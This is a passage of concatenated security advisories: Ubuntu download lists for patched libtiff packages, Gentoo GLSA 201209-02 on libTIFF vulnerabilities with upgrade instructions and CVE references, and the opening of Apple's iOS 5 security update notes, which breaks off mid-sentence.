http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_powerpc.deb\n      Size/MD5:   577476 53e4f31126ecae60b54a2614c29a02ef\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_powerpc.deb\n      Size/MD5:   135174 24d5e5f4e4903eae9ba2b4163eb0ab44\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_powerpc.deb\n      Size/MD5:     7512 a361eb4c3985a90189342aced3932676\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_powerpc.deb\n      Size/MD5:    13288 2f458ba98bbf136958d2a8cdc87a83ab\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-7ubuntu3.8_sparc.deb\n      Size/MD5:   178860 d48dc98bba2aaaf1830ad3a9d69b99db\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-7ubuntu3.8_sparc.deb\n      Size/MD5:   558838 c9ffd065811bf117f5c57dae82c4173b\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-7ubuntu3.8_sparc.deb\n      Size/MD5:   123254 e11f44522f5cef8b3f4a8a633be5437d\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-7ubuntu3.8_sparc.deb\n      Size/MD5:     4796 498f87c694b19560fe59ee3afb605af4\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-7ubuntu3.8_sparc.deb\n      Size/MD5:    10700 5bb66a32a926f8fbd1a5b864a3d88cd7\n\nUpdated packages for Ubuntu 9.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.5.diff.gz\n      Size/MD5:    43070 e8b35ecf046a7c3619e1d9929de8b830\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2-13ubuntu0.5.dsc\n      Size/MD5:     1978 d8a8180b56ba05c422d4b443afb1d44e\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.8.2.orig.tar.gz\n      Size/MD5:  1333780 e6ec4ab957ef49d5aabc38b7a376910b\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.8.2-13ubuntu0.5_all.deb\n      Size/MD5:   348112 a84bc452f3a0eea39c87ac3ac744112c\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_amd64.deb\n      Size/MD5:   191416 300ef146f5155ff8ccdf51e8a684ff34\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_amd64.deb\n      Size/MD5:   252426 b78ec6fcac494ac67fb4b357632dace3\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_amd64.deb\n      Size/MD5:   135940 d3f0cb6e3491b6d335e905ddb2139dfc\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_amd64.deb\n      Size/MD5:     6332 b7da9edb5b42f9c08596a6b1966cb6e0\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_amd64.deb\n      Size/MD5:    12004 3107c05e0644d55184c568fbd205c8d4\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_i386.deb\n      Size/MD5:   176368 b2b0a5ed89fa9405dea1a1944bf4e606\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_i386.deb\n      Size/MD5:   232588 71573f111b56ed24c2bb95e70cf24950\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_i386.deb\n      Size/MD5:   125002 9127f1c5991d7bebf346d7996aa05549\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_i386.deb\n      Size/MD5:     6446 8535ecbdf277f311afe69e053e7027eb\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_i386.deb\n      Size/MD5:    11292 21192b1ec3a90204f70ac7e715f6ef94\n\n  armel architecture (ARM Architecture):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_armel.deb\n      Size/MD5:   182752 27e8c1ba005bb913056725f27afed10b\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_armel.deb\n      Size/MD5:   233860 7bb2dfcf30084a32cfda47150de12820\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_armel.deb\n      Size/MD5:   124716 5bf3991de9df681e72aeb2b9cb0157e3\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_armel.deb\n      Size/MD5:     5966 f7269719e2c4b9f44abb54ea640452b9\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_armel.deb\n      Size/MD5:    11160 213b7115f391a62a039e86bd2aed21e3\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_lpia.deb\n      Size/MD5:   177048 6f228aae0027ce228001ab1e03c1420f\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_lpia.deb\n      Size/MD5:   234412 2be52c2f11d51dc60ebd6358921ed539\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_lpia.deb\n      Size/MD5:   126608 5b98943322e5546def050c29f0137c51\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_lpia.deb\n      Size/MD5:     6312 9dfcffd32f1aa8e42e6e5f94c8171333\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_lpia.deb\n      Size/MD5:    11340 69f92d56438e597d2733cca9fe192e09\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_powerpc.deb\n      Size/MD5:   191484 3af0b1c5f8e037c97831d2321c144069\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_powerpc.deb\n      Size/MD5:   256554 94513c2b20ec5e2206d5b5476ac4b6e1\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_powerpc.deb\n      Size/MD5:   137434 0dd8d58ca4136b26395ec9619352cbf4\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_powerpc.deb\n      Size/MD5:     6724 752b5398be235d406db9b0070c8b4bcc\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_powerpc.deb\n      Size/MD5:    12080 857d09fbe80934ec33149da04cf5b4fe\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_sparc.deb\n      Size/MD5:   184288 a83a8a638af348c50d3bb64a2c0490e4\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_sparc.deb\n      Size/MD5:   237164 9a5c6358c6c65dfc8e5154f79c5937a1\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_sparc.deb\n      Size/MD5:   125062 2e70ed4b0b98f15d9b6d4d1aa2c223fe\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_sparc.deb\n      Size/MD5:     6096 e374e39bdeb2b16f8944713dc6b59ec2\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_sparc.deb\n      Size/MD5:    12036 3bd0ece44e01a49c32decff3d318bcc3\n\nUpdated packages for Ubuntu 10.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.5.diff.gz\n      Size/MD5:    20142 b939eddaecc09a223f750ddc9ec300a7\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.5.dsc\n      Size/MD5:     1974 0ab3539d8af96ca2ca23c1d74d79e8c6\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2.orig.tar.gz\n      Size/MD5:  1419742 93e56e421679c591de7552db13384cb8\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.2-2ubuntu0.5_all.deb\n      Size/MD5:   359126 ddf2cb68732e7fd96ea2078ce0ad4742\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_amd64.deb\n      Size/MD5:   250490 975aec44c621ff1e524a7d0c344c461d\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_amd64.deb\n      Size/MD5:   269922 24ffd793f4f4cab1c419281358f95b06\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_amd64.deb\n      Size/MD5:   149244 8de4b36f57fd254339472d92d58df436\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_amd64.deb\n      Size/MD5:     6384 dd647e2d96b24485c9a3d512568a33e8\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_amd64.deb\n      Size/MD5:    12028 f312a06be417327ccaab3bc83fce43ee\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_i386.deb\n      Size/MD5:   234120 b80a26f6acbf41fc2835dea7be97d332\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_i386.deb\n      Size/MD5:   246962 2aced2d3476f07034714c32581451fca\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_i386.deb\n      Size/MD5:   136750 9e662029ab9932f9bb5cf551c9a25c70\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_i386.deb\n      Size/MD5:     6486 588d1bff01cbec45eefbfb25864b48c7\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_i386.deb\n      Size/MD5:    11282 028b976bcc83292a2a436961a26cff1b\n\n  armel architecture (ARM Architecture):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_armel.deb\n      Size/MD5:   237816 b1bb7396d24ca82d5a72012e7f5902df\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_armel.deb\n      Size/MD5:   238800 82ec468a735c037f758424ee05ab0eda\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_armel.deb\n      Size/MD5:   129636 b6277537fd8ca0a7258d156b8185fc6c\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_armel.deb\n      Size/MD5:     5980 5ee322e0d78f7f440501872a91e78c98\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_armel.deb\n      Size/MD5:    11300 c0120b282e1fa3c9922b9218a1d86271\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_powerpc.deb\n      Size/MD5:   253514 208b8a67298bb8435b790579c2369258\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_powerpc.deb\n      Size/MD5:   275256 4ccb314e621e464c06a709fbd7632384\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_powerpc.deb\n      Size/MD5:   150724 4787f755ef29dd7198699c9456ca5fd0\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_powerpc.deb\n      Size/MD5:     6770 759c330d4a755d3d217ca8afef8cb191\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_powerpc.deb\n      Size/MD5:    12092 86dd9f88b6d3f4e3f7ee0c3f98ce4448\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_sparc.deb\n      Size/MD5:   248776 0e081f6795686de636fdb537d0da0af3\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_sparc.deb\n      Size/MD5:   257346 b1cb2500a7b1ada561852e12546279a4\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_sparc.deb\n      Size/MD5:   143484 b24ccd56b9eee79c062d8a1e13e65326\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_sparc.deb\n      Size/MD5:     6226 28e807e1ae69640a7e0a35ea79b8913a\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_sparc.deb\n      Size/MD5:    11922 1acad867116630bb02cf53831f49fb91\n\nUpdated packages for Ubuntu 10.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.2.debian.tar.gz\n      Size/MD5:    18124 6b91f60b7bc92c8f0710f4088c1f38f3\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.2.dsc\n      Size/MD5:     1991 020c2a94b61792b09f6d01752f2c7f5d\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4.orig.tar.gz\n      Size/MD5:  1436968 2006c1bdd12644dbf02956955175afd6\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.4-2ubuntu0.2_all.deb\n      Size/MD5:   342928 4d7df4c971ba92ab11d738820853fcc4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_amd64.deb\n      Size/MD5:   248246 dd83a166330ad6268952b8e49f075012\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_amd64.deb\n      Size/MD5:   270788 73525f6754327725fd2e93fe1fc0e4fb\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_amd64.deb\n      Size/MD5:   149490 2da1a59a5a933e822256d2b6d89454c6\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_amd64.deb\n      Size/MD5:     6310 b566e3ac1e893179519b2596798ad492\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_amd64.deb\n      Size/MD5:    11806 a523fb6ef9ac518e5869fdc9bd72d937\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_i386.deb\n      Size/MD5:   230148 a676650de4cfea04a7bfd000de0da151\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_i386.deb\n      Size/MD5:   247138 95194c2ea2ab0ca87e6b8867dae07385\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_i386.deb\n      Size/MD5:   136668 f0931de0028f3538f92ef2547cde7bba\n    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_i386.deb\n      Size/MD5:     6424 ad458d476aa6df65bfaec35f5cba9c0b\n    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_i386.deb\n      Size/MD5:    11144 efd76c12cc9f9df3ba719e8f073a6bfa\n\n  armel architecture (ARM Architecture):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_armel.deb\n      Size/MD5:   256880 6aedba603449a04715b504caac95ed22\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_armel.deb\n      Size/MD5:   271424 0587dc26b90416181bb71f0ee0acbed3\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_armel.deb\n      Size/MD5:   151800 0a97a3959787ce6e4d4a60db21f4bd19\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_armel.deb\n      Size/MD5:     5844 6efde8a677921feabc6dd5156181d72a\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_armel.deb\n      Size/MD5:    11228 9e354f5270bc717488682dfc4712e74a\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_powerpc.deb\n      Size/MD5:   250366 6fa58ac5fb03e3b6866499f53cb3e79d\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_powerpc.deb\n      Size/MD5:   275860 d4f92d8330e793d8056e4bc5c180fba9\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_powerpc.deb\n      Size/MD5:   150712 c47116bbde1de23b39bd86ce6733e033\n    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_powerpc.deb\n      Size/MD5:     6702 d9524527cbcbd6b38cb782d73adbdc3b\n    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_powerpc.deb\n      Size/MD5:    11962 a31983d4e49adaa4fa0321c16105bae3\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201209-02\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: libTIFF: Multiple vulnerabilities\n     Date: September 23, 2012\n     Bugs: #307001, #324885, #357271, #359871, #371308, #410931,\n           #422673, #427166\n       ID: 201209-02\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in libTIFF could result in execution of\narbitrary code or Denial of Service. \n\nBackground\n==========\n\nlibTIFF provides support for reading and manipulating TIFF (Tagged\nImage File Format) images. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  media-libs/tiff             \u003c 4.0.2-r1              *\u003e= 3.9.5-r2\n                                                          \u003e= 4.0.2-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in libTIFF. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libTIFF 4.0 users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=media-libs/tiff-4.0.2-r1\"\n\nAll libTIFF 3.9 users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=media-libs/tiff-3.9.5-r2\"\n\nReferences\n==========\n\n[  1 ] CVE-2009-2347\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2347\n[  2 ] CVE-2009-5022\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5022\n[  3 ] CVE-2010-1411\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1411\n[  4 ] CVE-2010-2065\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2065\n[  5 ] CVE-2010-2067\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2067\n[  6 ] CVE-2010-2233\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2233\n[  7 ] CVE-2010-2443\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2443\n[  8 ] CVE-2010-2481\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2481\n[  9 ] CVE-2010-2482\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2482\n[ 10 ] CVE-2010-2483\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2483\n[ 11 ] CVE-2010-2595\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2595\n[ 12 ] CVE-2010-2596\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2596\n[ 13 ] CVE-2010-2597\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2597\n[ 14 ] CVE-2010-2630\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2630\n[ 15 ] CVE-2010-2631\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2631\n[ 16 ] CVE-2010-3087\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3087\n[ 17 ] CVE-2010-4665\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4665\n[ 18 ] CVE-2011-0192\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0192\n[ 19 ] CVE-2011-0192\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0192\n[ 20 ] CVE-2011-1167\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1167\n[ 21 ] CVE-2011-1167\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1167\n[ 22 ] CVE-2012-1173\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1173\n[ 23 ] CVE-2012-2088\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2088\n[ 24 ] CVE-2012-2113\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2113\n[ 25 ] CVE-2012-3401\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3401\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201209-02.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nAPPLE-SA-2011-10-12-1 iOS 5 Software Update\n\niOS 5 Software Update is now available and addresses the following:\n\nCalDAV\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  An attacker with a privileged network position may intercept\nuser credentials or other sensitive information from a CalDAV\ncalendar server\nDescription:  CalDAV did not check that the SSL certificate presented\nby the server was trusted. \nCVE-ID\nCVE-2011-3253 : Leszek Tasiemski of nSense\n\nCalendar\nAvailable for:  iOS 4.2.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 4.2.0 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 4.2.0 through 4.3.5 for iPad\nImpact:  Viewing a maliciously crafted calendar invitation may inject\nscript in the local domain\nDescription:  A script injection issue existed in Calendar\u0027s handling\nof invitation notes. This issue is addressed through improved\nescaping of special characters in invitation notes. This issues does\nnot affect devices prior to iOS 4.2.0. \nCVE-ID\nCVE-2011-3254 : Rick Deacon\n\nCFNetwork\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  User\u0027s AppleID password may be logged to a local file\nDescription:  A user\u0027s AppleID password and username were logged to a\nfile that was readable by applications on the system. This is\nresolved by no longer logging these credentials. \nCVE-ID\nCVE-2011-3255 : Peter Quade of qdevelop\n\nCFNetwork\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to the\ndisclosure of sensitive information\nDescription:  An issue existed in CFNetwork\u0027s handling of HTTP\ncookies. When accessing a maliciously crafted HTTP or HTTPS URL,\nCFNetwork could incorrectly send the cookies for a domain to a server\noutside that domain. \nCVE-ID\nCVE-2011-3246 : Erling Ellingsen of Facebook\n\nCoreFoundation\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Viewing a maliciously crafted website or e-mail message may\nlead to an unexpected application termination or arbitrary code\nexecution\nDescription:  A memory corruption issue existed in CoreFoundation\u0027s\nhandling of string tokenization. \nCVE-ID\nCVE-2011-0259 : Apple\n\nCoreGraphics\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Viewing a document containing a maliciously crafted font may\nlead to arbitrary code execution\nDescription:  Multiple memory corruption existed in freetype, the\nmost serious of which may lead to arbitrary code execution when\nprocessing a maliciously crafted font. \nCVE-ID\nCVE-2011-3256 : Apple\n\nCoreMedia\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Visiting a maliciously crafted website may lead to the\ndisclosure of video data from another site\nDescription:  A cross-origin issue existed in CoreMedia\u0027s handling of\ncross-site redirects. This issue is addressed through improved origin\ntracking. \nCVE-ID\nCVE-2011-0187 : Nirankush Panchbhai and Microsoft Vulnerability\nResearch (MSVR)\n\nData Access\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  An exchange mail cookie management issue could incorrectly\ncause data synchronization across different accounts\nDescription:  When multiple mail exchange accounts are configured\nwhich connect to the same server, a session could potentially receive\na valid cookie corresponding to a different account. This issue is\naddressed by ensuring that cookies are separated across different\naccounts. \nCVE-ID\nCVE-2011-3257 : Bob Sielken of IBM\n\nData Security\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  An attacker with a privileged network position may intercept\nuser credentials or other sensitive information\nDescription:  Fraudulent certificates were issued by multiple\ncertificate authorities operated by DigiNotar. This issue is\naddressed by removing DigiNotar from the list of trusted root\ncertificates, from the list of Extended Validation (EV) certificate\nauthorities, and by configuring default system trust settings so that\nDigiNotar\u0027s certificates, including those issued by other\nauthorities, are not trusted. \n\nData Security\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  Support for X.509 certificates with MD5 hashes may expose\nusers to spoofing and information disclosure as attacks improve\nDescription:  Certificates signed using the MD5 hash algorithm were\naccepted by iOS. This algorithm has known cryptographic weaknesses. \nFurther research or a misconfigured certificate authority could have\nallowed the creation of X.509 certificates with attacker controlled\nvalues that would have been trusted by the system. This would have\nexposed X.509 based protocols to spoofing, man in the middle attacks,\nand information disclosure. This update disables support for an X.509\ncertificate with an MD5 hash for any use other than as a trusted root\ncertificate. \nCVE-ID\nCVE-2011-3427\n\nData Security\nAvailable for:  iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\niOS 3.2 through 4.3.5 for iPad\nImpact:  An attacker could decrypt part of a SSL connection\nDescription:  Only the SSLv3 and TLS 1.0 versions of SSL were\nsupported. These versions are subject to a protocol weakness when\nusing block ciphers. A man-in-the-middle attacker could have injected\ninvalid data, causing the connection to close but 